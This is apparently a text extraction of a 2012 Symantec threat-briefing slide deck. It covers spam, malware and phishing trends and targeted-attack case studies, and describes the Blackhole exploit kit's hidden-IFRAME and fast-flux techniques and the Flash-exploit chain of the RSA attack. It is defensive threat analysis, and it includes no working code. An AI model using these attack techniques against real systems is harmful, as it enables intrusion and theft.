Understanding Risk: The Internet Threat Landscape Paul Wood
by user
Comments
Transcript
Understanding Risk: The Internet Threat Landscape Paul Wood
Understanding Risk: The Internet Threat Landscape Paul Wood Cyber Security Intelligence The Internet Threat Landscape 1 Introduction • Spam levels falling as spam becomes more targeted • Malware attacks continue to grow rapidly • Number of data breaches continues to rise • Mobile threats expose organizations and consumers • Targeted attacks have expanded and increased in number • No business is too small to be a target… The Internet Threat Landscape 2 Symantec Intelligence Dublin, Ireland Toronto, Canada Gloucester, UK San Francisco, CA Mountain View, CA Tokyo, Japan Chengdu, China Austin, TX Culver City, CA Pune, India Chennai, India Taipei, Taiwan Sydney. Australia Worldwide Coverage Global Scope and Scale 24x7 Event Logging Rapid Detection Attack Activity • 64M+ sensors • 200+ countries and territories Malware Intelligence • 135M+ systems monitored • 11 security response centers Preemptive Security Alerts The Internet Threat Landscape Vulnerabilities • 48,000+ vulnerabilities • 16,000+ vendors • 105,000+ technologies Information Protection Spam/Phishing • 5M+ decoy accounts • 8B+ email messages/day • 1B+ web requests/day Threat Triggered Actions 3 Spam Levels Falling As Spam Becomes More Targeted The Internet Threat Landscape 4 Spam Activity Trends: Global Spam Rate 85.9% Saudi Arabia 81.9% Hungary 70.6% Last Month: Six MonthAvg.: 68.8% 69.9% 71.4% 1-250 72.2% IT Services 70.2% 71.8% Education 77.2% Sri Lanka 71.6% Recreation 75.5% Qatar 70.7% 1501-2500 71.3% Accommodation/Catering Top 5 Geographies 501-1000 70.7% 1001-1500 71.5% Non-Profit 75.4% China 251-500 70.6% 70.3% 2501+ Top 5 Verticals By Horizontal 70.6% 2006 2007 Sources 2008 2009 2010 2011 United States 2012 12.7% India 6.9% Canada 6.3% Russian Federation 4.8% Brazil 4.3% Finland 3.7% Peru 3.09% Germany 3.08% Korea (South) 3.07% France 3.06% December 2012 The Internet Threat Landscape 5 What are spam‐sending botnets? • Approx. USD $15 for 10,000 bots Command & Control Botnet Controller The Internet Threat Landscape 6 Social Engineering + Social Media = Targeted Spam • Cyber criminals taking advantage of social media – Social Media is viral in nature – Use of ‘trending topics’ and news feeds to target users – People are less suspicious of content from friends – Shortened URLs frequently used – Social engineering is effective with social media The Internet Threat Landscape 7 Malware Attacks Continue to Grow Rapidly 8 Email Malware Activity Trends: Global Virus Rate 1 in 77.5 South Africa 1 in 94.0 Australia 1 in 277.8 Last Month: Six MonthAvg.: 1 in 255.8 1 in 258.0 1 in 291.4 1-250 1 in 69.4 Public Sector 1 in 355.2 1 in 125.5 Transport/Utilities 1 in 177.3 United Kingdom 1 in 423.8 1 in 179.9 Recreation 1 in 266.4 Italy 1 in 129.9 1001-1500 1 in 207.3 Education 1 in 290.1 Canada 1 in 233.0 Marketing/Media Top 5 Geographies Top 5 Verticals 1 in 305.9 1501-2500 1 in 278.1 2501+ By Horizontal • 27.2% of email malware contained URLs • Approx. 0.2% are targeted 2006 2007 Sources 2008 2009 251-500 501-1000 2010 2011 1 in 277.8 2012 United States 40.9% United Kingdom 24.9% Australia 9.1% India 4.3% Sweden 2.9% Canada 2.5% Brazil 2.1% Netherlands 1.7% Hong Kong 1.7% France 1.6% December 2012 The Internet Threat Landscape 9 New ‘fast‐flux’ update to Blackhole in June 2012 Compromised Web Site DNS lfbovcaitd[~~~~~].ru • Compromised server hosts Malicious JavaScript code to load exploits • Domain name of exploit server is calculated from the date • Exploit is loaded via hidden IFRAME • Domains are registered months in advance * http://www.symantec.com/connect/blogs/blackhole-theory 10 New update to ‘Blackhole’ in June 2012 • Exploits hosted ‘in‐the‐cloud’ • DNS fast‐flux used to hide IP This code uses the fromCharCode() method of the String object to build up a huge string containing JavaScript code to run… Hidden IFRAME loads exploits hosted on: lfbovcaitd[REMOVED].ru The Internet Threat Landscape 11 Targeted Attacks Have Expanded 12 Typical profile of a phishing attack: Social Engineering Malicious URLs appear in emails designed to appear legitimate Spoofed or compromised website is used to capture account information or install malware The Internet Threat Landscape 13 Phishing Activity Trends: Global Phishing Rate 1 in 81.4 Norway 1 in 84.2 South Africa 1 in 377.4 Last Month: Six MonthAvg.: 1 in 445.1 1 in 357.2 1 in 221.7 1-250 1 in 134.7 Public Sector 1 in 90.0 Spain 1 in 211.1 Marketing/Media 1 in 223.0 Agriculture 1 in 229.3 United Kingdom 1 in 544.9 251-500 1 in 589.8 501-1000 1 in 574.6 1001-1500 1 in 230.9 Education 1 in 253.8 Singapore 1 in 258.0 Estate Agents Top 5 Geographies Top 5 Verticals 1 in 479.8 1501-2500 1 in 418.6 2501+ By Horizontal 1 in 377.4 2006 2007 Sources 2008 2009 2010 2011 2012 United States 24.2% Norway 20.2% Spain 17.8% United Kingdom 16.3% Hong Kong 9.1% Korea, Republic of 3.8% Canada 1.9% Germany 1.5% France 0.9% Australia 0.9% December 2012 The Internet Threat Landscape 14 Characteristics of Targeted Attacks Targeted Non‐Targeted Rare Attack relevant to interests of recipient Low copy number Bespoke malware Obscure business model Very common No regard to recipient High copy number Often kit based Clear financial incentive The attackers’ aim appears to be covert gathering and transmitting of commercially or economically valuable information… The Internet Threat Landscape 15 Targeted Attacks and Social Engineering Attacker http://compromised URL/abc.html Target The Internet Threat Landscape 16 Risk from Targeted Attacks Increased in 2011: Global • Average of 80 attacks per day in 2011* 18% *Analysis based on Symantec Customers: 2011 17 Targeted Attacks by Job Function The Internet Threat Landscape 18 Risk from Targeted Attacks Continues in 2012: Global • Average of 186 attacks per day in 2012* *Analysis based on Symantec Customers: Jan ‐ June 2012 19 Targeted Attacks by Target Geography: 2012 18% *Analysis based on Symantec Customers: Jan ‐ June 2012 20 Case Study: Large Scale Attack Against One Client • Single client targeted by thousands of attacks over a few days – very rare! • Many users targeted using different exploits and social engineering tactics The Internet Threat Landscape 21 Case Study: Office Documents Containing Exploits • Office document contains exploit that drops malicious code • Detected by Skeptic™ only… The Internet Threat Landscape 22 Case Study: Encrypted Office Documents Word document is password protected • Password contained in email message • Exploit contained in document • Document contains hidden code that is executed… • The Internet Threat Landscape 23 Case Study: Attacks Against Entertainment Industry • A series of attacks have been conducted over a period of at least two years against a company that produces video games • The purposes of these attacks seem to be to gain access to the intellectual property used within their products • The Japanese text shown in the second example translates to: "Hope to correct accidentally discovered a design flaw in the game." The Internet Threat Landscape 24 Case Study: RSA Attacks (CVE‐2011‐0609) Begins with a Spear Phishing Email : Traits ’s line t n e i p o reci k t d e t r R el a of w o nglish E ” e g “Stran ly the e r a r ent is t i p i c e r rge Email end ta used e r n e ofte r a s l i Ema The Internet Threat Landscape 25 Case Study: RSA Attacks (CVE‐2011‐0609) Zero‐day Flash Exploit Used to Drop Backdoor SWF‐1 decodes SWF‐2 and provides heapspray for shellcode XLS attachment contains embedded SWF The Internet Threat Landscape Shellcode drops malicious executable and runs it to install backdoor program. SWF‐2 exploits Flash vulnerability CVE‐2011‐ 0609 26 No business is too small to be a target… 27 Targeted Attacks by Size: Global, 2012 • • Attacks against >2500 increased from 50% in 2011 to 52% in 2012 SMB attacks increased from 18% to 31% The Internet Threat Landscape 28 Targeted Attacks by Industry Sector: Global, 2012 The Internet Threat Landscape 29 What’s Ahead? • Targeted attacks will be ongoing and will expand • Macs are not immune to malware – The use of Java for cross‐platform attacks was discussed in ISTR 16 – Attack kits include Mac exploits • Malware authors will capitalize on co‐mingling of work and personal lives – BYOD concerns will continue in 2013 as SMBs begin to tackle the issues – As financial transactions move to mobile devices, attackers will follow • Attacks exploiting social media will continue – Social apps via mobile devices will become more popular targets, especially those aimed at teenagers and young adults The Internet Threat Landscape 30 Tips to avoid falling victim to a targeted attack • Requires at least three things: – Education: Help people know what to look for and be suspicious – Policies: Try to reduce risk by establishing AUPs and communicating them – Technology: Can prevent attacks and to manage policies • For PR, HR and generic accounts (e.g. info@) be especially cautious. These are often targeted as they expect to receive emails from people they don’t know, with attachments such as documents or zipped files • Be careful what you say on social networks, who you connect with and how you use social media in general – too much information can help the attackers • Remember ‐ Targeted attacks will be relevant and may come from someone you know. Good technology can help to protect you… The Internet Threat Landscape 31 End‐to‐End Messaging Security Symantec Email Security .Cloud Symantec Mail Security for Exchange Symantec Messaging Gateway MAPI SMTP Secure Email Gateway CLOUD MS Exchange Edge Transport Server DMZ Gateway Layer Reduce infrastructure demands by removing threats and unwanted mail in the cloud or at the gateway with Symantec Messaging Gateway or Symantec Email Security .Cloud. The Internet Threat Landscape MS Exchange Hub Transport / CAS Server MAPI/EWS MS Exchange Mailbox Server INTERNAL/PRIVATE NETWORK Internal Layer Detect threats amongst internal traffic and provide a second layer of protection with Symantec Mail Security for Exchange. Protects the core messaging infrastructure with the ability to detect previously unknown threats and apply content control policies retroactively on mailbox data. 32 Symantec.cloud Email Services A Cloud Security Approach All mail from customers organization is clean, legitimate & relevant All mail to your organization All mail delivered to users is clean, legitimate & relevant Brightmail™ Traffic Shaper SMTP Heuristics User Validation Access their email even if their mail servers fail Commercial DNS Blocklists Brightmail™ Symantec AV Engine Skeptic™ Archiving Continuity Store only relevant email • Less on-premises storage • Easier to index and search 9% Apply encryption based on policy Policy Based Encryption The Internet Threat Landscape Control Inbound Outbound 33 Skeptic™ ‐ Knowing What a Safe Document Looks Like • Comparison of legitimate Office document vs. a document containing hidden executable code The Internet Threat Landscape 34 Thank you! Paul Wood [email protected] @symantec, @symanteccloud, @norton, @threatintel, @paulowoody www.symanteccloud.com/intelligence www.symantec.com/spam Copyright © 2012 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice. The Internet Threat Landscape 35